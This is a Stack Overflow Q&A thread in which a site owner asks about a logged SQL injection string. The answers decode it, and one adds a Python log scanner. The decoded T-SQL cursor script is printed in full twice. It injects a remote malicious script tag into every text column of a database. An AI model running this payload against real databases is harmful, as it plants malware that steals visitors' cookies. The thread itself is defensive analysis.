12

Possible Duplicate:
Attempted SQL injection attack - what are they trying to do?

I have seen this SQL injection attempt on my site many times in the last few months.

';DECLARE @S CHAR(4000);SET @S=CAST(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 AS CHAR(4000));EXEC(@S);

After going through my code, I'm sure I'm protected because I query against an in-memory dataset rather than the database itself. However, even though I'm sure I'm protected, I don't fully understand what's going on with this attack attempt and would like to figure it out so I can avoid writing code in the future that may be vulnerable to it.

Can anyone explain to me what these hackers are attempting to do with this code?

Thanks.

-This code is getting appended to the query string as well as getting sent as post data.

Ryan Smith
  • If you've already been infected, check out this SO thread for help on resolving the issue: http://stackoverflow.com/questions/32412/whats-the-best-way-of-cleaning-up-after-a-sql-injection#32422 – Dillie-O Dec 15 '08 at 23:07
  • Seems like you're more prepared than some other sites: http://blogs.zdnet.com/security/?p=2039 – Jimmy Dec 15 '08 at 23:21
  • Yeah, I'm used to seeing hack attempts with the standard SQL injection attempts trying to get links on the site and what-not. When I saw this one, I thought - wow, that's pretty clever, I had better check my source to find any possible attack vectors. – Ryan Smith Dec 16 '08 at 02:00

4 Answers

20

Note: my first explanation was incorrect because I didn't actually read through the whole thing...

Here's what that translates to. It searches your database for text or varchar columns (b.xtype in 99,35,231,167) and then injects a javascript file into all text columns in your database. A bit more malicious than I first thought.

DECLARE 
    @T varchar(255),
    @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR 
    select a.name,b.name 
    from sysobjects a,syscolumns b 
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN 
    exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor
Jimmy
7

Actually Jimmy, if you analyze this code, it uses a cursor to inject a javascript reference to hxxp://www2.s800qn.cn/csrss/w.js in every text field in the database.

This means that they don't care about your database, what they want is to use your page to steal data from the users browsing it.

That javascript link is now dead, but it probably contained code to grab the users' cookies.

CanSpice
FlySwat
  • yeah, I noticed that after I posted my original answer, so I rewrote. Thanks for the catch – Jimmy Dec 15 '08 at 23:15
  • Cripes... does StackOverflow automatically make any "http://blahblah.com" strings into active links? I know you didn't do that on purpose! :) – Bryan Feb 17 '09 at 03:45
3

Further to Jimmy's post: you can also use a hex-ascii translator to get this:

DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR  FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor INTO @T'@C 
WHILE(@@FETCH_STATUS=0) BEGIN 
exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn/csrs/w.js"></script>''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script>''')
FETCH NEXT FROM  Table_Cursor INTO @T'@C END 
CLOSE Table_Cursor DEALLOCATE Table_Cursor
Michael Sharek
  • I ran into this a while back and created a small Winforms app that will do the translation for you as well, thanks to some help from some SO folks here: http://www.codeplex.com/urldecoder – Dillie-O Dec 15 '08 at 23:05
  • http://www.string-functions.com/hex-string.aspx – jason saldo Dec 15 '08 at 23:05
  • Wow, I went to all that crazy work and yet there was already a web site that slipped through my googling fingers... Well, at least I learned some new stuff through the process. 8^D – Dillie-O Dec 15 '08 at 23:22
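The answer above decodes the hex by hand with a web translator. The same translation is easy to automate and to run over request logs, which matters because the question notes the string arrives both in the query string and as POST data. The following is an added example, not code from this thread or from any of the tools linked above: it URL-decodes a request, finds the `CAST(0x... AS CHAR(n))` wrapper, and turns the hex back into text the way SQL Server would (CHAR/VARCHAR as single-byte text, NCHAR/NVARCHAR as UTF-16 little-endian). The sample requests and the hex body in them are constructed from a harmless stand-in string; the function names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Matches the CAST(0x<hex> AS CHAR(n)) / NVARCHAR(n) wrapper that hides the
# real statement from naive keyword filters; captures the hex body and type.
HEX_CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)


def decode_hex_cast(hex_body: str, sql_type: str) -> str:
    """Decode the hex literal as SQL Server would for the given character type."""
    raw = bytes.fromhex(hex_body)
    if sql_type.upper().startswith("N"):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def extract_payloads(request_text: str) -> list[str]:
    """URL-decode one request (query string or POST body) and return every
    hex-wrapped statement found in it, already translated to text."""
    text = unquote_plus(request_text)
    return [decode_hex_cast(h, t) for h, t in HEX_CAST_RE.findall(text)]


def scan_requests(requests: list[str]) -> list[tuple[int, str]]:
    """Return (request index, decoded statement) for every hit in a batch."""
    hits = []
    for idx, req in enumerate(requests):
        for decoded in extract_payloads(req):
            hits.append((idx, decoded))
    return hits


# Constructed stand-in for the real cursor script; only its shape matters here.
SAMPLE_BODY = "DECLARE @T varchar(255) -- constructed stand-in for the real script"
SAMPLE_HEX_CHAR = SAMPLE_BODY.encode("ascii").hex().upper()
SAMPLE_HEX_NVARCHAR = SAMPLE_BODY.encode("utf-16-le").hex()

# Constructed request lines: one URL-encoded query string in the shape seen in
# the question, one clean request, one POST body using the NVARCHAR variant.
SAMPLE_REQUESTS = [
    "GET /product.aspx?id=12%27%3BDECLARE+%40S+CHAR%284000%29%3BSET+%40S%3DCAST%280x"
    + SAMPLE_HEX_CHAR + "+AS+CHAR%284000%29%29%3BEXEC%28%40S%29%3B HTTP/1.1",
    "GET /product.aspx?id=12 HTTP/1.1",
    "POST /search.aspx q=';DECLARE @S NVARCHAR(4000);SET @S=CAST(0x"
    + SAMPLE_HEX_NVARCHAR + " AS NVARCHAR(4000));EXEC(@S);--",
]


if __name__ == "__main__":
    for idx, decoded in scan_requests(SAMPLE_REQUESTS):
        print(f"request {idx}: {decoded}")
```

Running this over real web server logs gives the decoded statement for every such hit, so you can see what the cursor script would have done without pasting the hex into a third-party site.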
2

Just to help, if you haven't figured it out already: this is an automated attack, not a targeted one. And the purpose of the included .js file is distributing malware by using your website; it includes several exploits that mostly target IE users.

dr. evil